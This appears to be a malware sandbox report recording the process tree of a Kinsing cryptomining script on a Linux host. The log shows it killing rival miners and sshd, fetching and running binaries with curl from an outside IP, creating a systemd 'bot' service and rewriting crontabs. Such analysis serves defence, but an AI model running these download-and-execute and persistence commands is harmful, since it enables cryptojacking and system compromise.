/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1386
-
-
/bin/grepgrep exe2⤵PID:1389
-
-
/bin/lsls -latrh /proc/vmstat2⤵PID:1388
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1391
-
-
/bin/grepgrep exe2⤵PID:1394
-
-
/bin/lsls -latrh /proc/zoneinfo2⤵PID:1393
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1396
-
-
/usr/bin/idid -u2⤵PID:1397
-
-
/usr/bin/sudosudo mkdir /etc/data2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1398 -
/usr/sbin/sendmailsendmail -t3⤵PID:1404
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmOVy-0000Me-Gw4⤵
- Reads CPU attributes
PID:1417
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:1407
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmOVy-0000Mh-HN4⤵
- Reads CPU attributes
PID:1418
-
-
-
/bin/mkdirmkdir /etc/data3⤵PID:1408
-
-
-
/usr/bin/idid -u2⤵PID:1409
-
-
/bin/unameuname -i2⤵
- Attempts to change immutable files
PID:1410
-
-
/bin/unameuname -m2⤵PID:1411
-
-
/bin/grepgrep -e /dev2⤵PID:1414
-
-
/bin/lsls -la /etc/data2⤵PID:1413
-
-
/bin/grepgrep -v grep2⤵PID:1415
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
PID:1416
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1419
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1421
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵PID:1422
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
PID:1423
-
-
/usr/bin/pkillpkill -f sysupdater2⤵
- Reads CPU attributes
PID:1424
-
-
/usr/bin/pkillpkill -f php-update.service2⤵
- Reads CPU attributes
PID:1428
-
-
/usr/bin/pkillpkill -f update-setup2⤵
- Reads CPU attributes
PID:1429
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1432
-
-
/bin/grepgrep :14142⤵PID:1431
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1433
-
-
/bin/grepgrep -v -2⤵PID:1434
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1435
-
-
/bin/grepgrep rtw88_pcied2⤵PID:1437
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1436
-
-
/bin/grepgrep -v grep2⤵PID:1438
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1440
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1439
-
-
/bin/grepgrep stratum2⤵PID:1442
-
-
/bin/grepgrep -v grep2⤵PID:1443
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1445
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1441
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1444
-
-
/bin/grepgrep Sofia2⤵PID:1447
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1446
-
-
/bin/grepgrep -v grep2⤵PID:1448
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1449
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1450
-
-
/usr/bin/pkillpkill -f Sofia2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1451
-
-
/bin/grepgrep tracepath2⤵PID:1453
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1452
-
-
/bin/grepgrep -v grep2⤵PID:1454
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1456
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1455
-
-
/bin/grepgrep -v grep2⤵PID:1459
-
-
/bin/grepgrep /dot2⤵PID:1458
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1457
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1460
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1461
-
-
/bin/grepgrep -v grep2⤵PID:1464
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1463
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1465
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1466
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1462
-
-
/bin/grepgrep -v grep2⤵PID:1469
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1467
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1468
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1471
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1470
-
-
/bin/grepgrep "bash -k"2⤵PID:1473
-
-
/bin/grepgrep -v grep2⤵PID:1474
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1472
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1476
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1475
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1478
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1481
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1482
-
-
/bin/grepgrep perfctl2⤵PID:1479
-
-
/bin/grepgrep -v grep2⤵PID:1480
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1483
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads CPU attributes
PID:1484
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1485
-
-
/bin/grepgrep ./ll12⤵PID:1486
-
-
/bin/grepgrep -v grep2⤵PID:1487
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1488
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1489
-
-
/bin/grepgrep agetty2⤵PID:1491
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1490
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1493
-
-
/bin/grepgrep -v grep2⤵PID:1492
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1494
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
- Reads runtime system information
PID:1495
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1498
-
-
/bin/grepgrep 207.38.87.62⤵PID:1497
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1499
-
-
/bin/grepgrep -v -2⤵PID:1500
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1501
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1504
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1503
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1505
-
-
/bin/grepgrep -v -2⤵PID:1506
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1507
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1509
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1511
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1510
-
-
/bin/grepgrep -v -2⤵PID:1512
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1513
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1516
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1515
-
-
/bin/grepgrep -v -2⤵PID:1518
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1517
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1519
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1521
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1522
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1523
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1525
-
-
/bin/grepgrep -v -2⤵PID:1524
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1526
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
- Reads runtime system information
PID:1527
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
PID:1528
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
- Reads runtime system information
PID:1529
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads runtime system information
PID:1530
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1531
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1532
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
PID:1533
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
PID:1534
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1535
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
PID:1536
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
PID:1537
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
PID:1539
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
PID:1540
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1541
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
PID:1543
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
PID:1544
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1545
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1546
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1547
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
- Reads runtime system information
PID:1548
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1549
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
PID:1550
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1551
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
PID:1552
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
PID:1553
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
PID:1554
-
-
/bin/grepgrep -v grep2⤵PID:1557
-
-
/bin/grepgrep ./udp2⤵PID:1556
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1555
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1558
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1559
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵
- Attempts to change immutable files
PID:1560
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1562
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1561
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵
- Attempts to change immutable files
PID:1563
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1565
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1564
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵
- Attempts to change immutable files
PID:1566
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1567
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1568
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵
- Attempts to change immutable files
PID:1569
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1570
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1571
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵
- Attempts to change immutable files
PID:1572
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1574
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1573
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵
- Attempts to change immutable files
PID:1575
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1576
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1577
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1578
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1579
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1580
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵
- Attempts to change immutable files
PID:1581
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1583
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1582
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵
- Attempts to change immutable files
PID:1584
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1586
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1585
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵
- Attempts to change immutable files
PID:1587
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1589
-
-
/bin/catcat /data/./oka.pid2⤵PID:1588
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d2⤵
- Attempts to change immutable files
PID:1590
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1592
-
-
/bin/catcat /tmp/.ICE-unix/d2⤵PID:1591
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m2⤵
- Attempts to change immutable files
PID:1593
-
-
/bin/catcat /tmp/.ICE-unix/m2⤵PID:1594
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1595
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1596
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1597
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1598
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1599
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1600
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
PID:1601
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
PID:1602
-
-
/bin/grepgrep -v grep2⤵PID:1605
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1606
-
-
/bin/grepgrep ./oka2⤵PID:1604
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1603
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1607
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1608
-
-
/bin/grepgrep -v grep2⤵PID:1610
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1611
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1609
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1612
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1614
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1613
-
-
/bin/grepgrep -v "\\["2⤵PID:1616
-
-
/bin/grepgrep -v bin2⤵PID:1615
-
-
/bin/grepgrep -v "("2⤵PID:1617
-
-
/bin/grepgrep -v php-fpm2⤵PID:1618
-
-
/bin/grepgrep -v proxymap2⤵PID:1619
-
-
/bin/grepgrep -v postgres2⤵PID:1620
-
-
/bin/grepgrep -v postgrey2⤵PID:1621
-
-
/bin/grepgrep -v kinsing2⤵PID:1622
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1623
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1624
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1626
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
PID:1625
-
-
/bin/grepgrep -v "\\["2⤵PID:1628
-
-
/bin/grepgrep -v bin2⤵PID:1627
-
-
/bin/grepgrep -v "("2⤵PID:1629
-
-
/bin/grepgrep -v php-fpm2⤵PID:1630
-
-
/bin/grepgrep -v proxymap2⤵PID:1631
-
-
/bin/grepgrep -v postgres2⤵PID:1632
-
-
/bin/grepgrep -v postgrey2⤵PID:1633
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1634
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1635
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1636
-
-
/bin/grepgrep -v bin2⤵PID:1638
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1637
-
-
/bin/grepgrep -v "("2⤵PID:1640
-
-
/bin/grepgrep -v "\\["2⤵PID:1639
-
-
/bin/grepgrep -v proxymap2⤵PID:1642
-
-
/bin/grepgrep -v php-fpm2⤵PID:1641
-
-
/bin/grepgrep -v postgres2⤵PID:1643
-
-
/bin/grepgrep -v postgrey2⤵PID:1644
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1645
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1646
-
-
/bin/grepgrep -v grep2⤵PID:1648
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1649
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1650
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1647
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1651
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1655
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1654
-
-
/bin/rmrm -rf /etc/data/kinsing2⤵PID:1656
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1657
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing2⤵
- Checks CPU configuration
PID:1658
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1659
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1663
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1662
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1666
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1667
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1668
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵
- Checks CPU configuration
PID:1669
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1670
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1673
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1674
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1675
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵
- Checks CPU configuration
PID:1676
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1677
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1680
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1681
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:1682
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1683
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1684
-
-
/etc/data/kinsing/etc/data/kinsing2⤵PID:1685
-
-
/usr/bin/idid -u2⤵PID:1687
-
-
/bin/systemctlsystemctl enable bot2⤵
- Enumerates kernel/hardware configuration
PID:1689
-
-
/bin/systemctlsystemctl start bot2⤵
- Enumerates kernel/hardware configuration
PID:1703
-
-
/bin/sedsed /base64/d2⤵PID:1708
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1709
-
-
/usr/bin/crontabcrontab -l2⤵PID:1707
-
-
/usr/bin/crontabcrontab -l2⤵PID:1710
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1712
-
-
/bin/sedsed /_cron/d2⤵PID:1711
-
-
/bin/sedsed /31.210.20.181/d2⤵PID:1714
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1715
-
-
/usr/bin/crontabcrontab -l2⤵PID:1713
-
-
/bin/sedsed /update.sh/d2⤵PID:1717
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1718
-
-
/usr/bin/crontabcrontab -l2⤵PID:1716
-
-
/bin/sedsed /logo4/d2⤵PID:1720
-
-
/usr/bin/crontabcrontab -l2⤵PID:1719
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1721
-
-
/bin/sedsed /logo9/d2⤵PID:1723
-
-
/usr/bin/crontabcrontab -l2⤵PID:1722
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1724
-
-
/bin/sedsed /logo0/d2⤵PID:1726
-
-
/usr/bin/crontabcrontab -l2⤵PID:1725
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1727
-
-
/usr/bin/crontabcrontab -l2⤵PID:1728
-
-
/bin/sedsed /logo/d2⤵PID:1729
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1730
-
-
/bin/sedsed /tor2web/d2⤵PID:1732
-
-
/usr/bin/crontabcrontab -l2⤵PID:1731
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1733
-
-
/usr/bin/crontabcrontab -l2⤵PID:1734
-
-
/bin/sedsed /jpg/d2⤵PID:1735
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1736
-
-
/bin/sedsed /png/d2⤵PID:1738
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1739
-
-
/usr/bin/crontabcrontab -l2⤵PID:1737
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1742
-
-
/bin/sedsed /tmp/d2⤵PID:1741
-
-
/usr/bin/crontabcrontab -l2⤵PID:1740
-
-
/bin/sedsed /zmreplchkr/d2⤵PID:1744
-
-
/usr/bin/crontabcrontab -l2⤵PID:1743
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1745
-
-
/bin/sedsed /aliyun.one/d2⤵PID:1747
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1748
-
-
/usr/bin/crontabcrontab -l2⤵PID:1746
-
-
/bin/sedsed /3.215.110.66.one/d2⤵PID:1750
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1751
-
-
/usr/bin/crontabcrontab -l2⤵PID:1749
-
-
/bin/sedsed /pastebin/d2⤵PID:1753
-
-
/usr/bin/crontabcrontab -l2⤵PID:1752
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1754
-
-
/bin/sedsed /onion/d2⤵PID:1756
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1757
-
-
/usr/bin/crontabcrontab -l2⤵PID:1755
-
-
/bin/sedsed /lsd.systemten.org/d2⤵PID:1759
-
-
/usr/bin/crontabcrontab -l2⤵PID:1758
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1760
-
-
/bin/sedsed /shuf/d2⤵PID:1762
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1763
-
-
/usr/bin/crontabcrontab -l2⤵PID:1761
-
-
/bin/sedsed /ash/d2⤵PID:1765
-
-
/usr/bin/crontabcrontab -l2⤵PID:1764
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1766
-
-
/bin/sedsed /mr.sh/d2⤵PID:1768
-
-
/usr/bin/crontabcrontab -l2⤵PID:1767
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1769
-
-
/usr/bin/crontabcrontab -l2⤵PID:1770
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1771
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1772
-
-
/bin/sedsed /localhost.xyz/d2⤵PID:1774
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1775
-
-
/usr/bin/crontabcrontab -l2⤵PID:1773
-
-
/bin/sedsed /45.137.151.106/d2⤵PID:1777
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1778
-
-
/usr/bin/crontabcrontab -l2⤵PID:1776
-
-
/bin/sedsed /111.90.159.106/d2⤵PID:1780
-
-
/usr/bin/crontabcrontab -l2⤵PID:1779
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1781
-
-
/bin/sedsed /github/d2⤵PID:1783
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1784
-
-
/usr/bin/crontabcrontab -l2⤵PID:1782
-
-
/bin/sedsed /bigd1ck.com/d2⤵PID:1786
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1787
-
-
/usr/bin/crontabcrontab -l2⤵PID:1785
-
-
/bin/sedsed /xmr.ipzse.com/d2⤵
- System Network Configuration Discovery
PID:1789
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1790
-
-
/usr/bin/crontabcrontab -l2⤵PID:1788
-
-
